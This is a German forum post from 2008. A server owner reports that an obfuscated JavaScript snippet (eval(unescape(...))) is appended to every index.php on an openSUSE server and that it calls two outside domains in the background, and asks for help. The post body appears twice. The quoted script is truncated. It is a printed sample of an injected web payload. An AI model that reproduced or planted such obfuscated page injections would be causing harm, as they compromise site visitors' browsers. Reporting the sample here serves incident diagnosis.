Seltsames Script wird ausgeführt
Posted: 2008-01-24 18:13
Hallo
Ich habe heute festgestellt, dass auf allen Webseiten, die auf meinem Server mit opensuse 10.1, am Ende jeder index.php ein Kode eingefügt wird:
<!-- 1201194730 --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C......B"));
</script>
Außerdem werden im Hintergrund (sieht in Browser Statuszeile) zwei Webseiten aufgerufen:
ol1mpus.cn
duplishe.org/count=7
Ich habe schon chrootkit ausgeführt, aber es wurde nichts gefunden.
Kann mir jemand helfen? Ich brauche dringend hilfe.
Ich habe heute festgestellt, dass auf allen Webseiten, die auf meinem Server mit opensuse 10.1, am Ende jeder index.php ein Kode eingefügt wird:
<!-- 1201194730 --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C......B"));
</script>
Außerdem werden im Hintergrund (sieht in Browser Statuszeile) zwei Webseiten aufgerufen:
ol1mpus.cn
duplishe.org/count=7
Ich habe schon chrootkit ausgeführt, aber es wurde nichts gefunden.
Kann mir jemand helfen? Ich brauche dringend hilfe.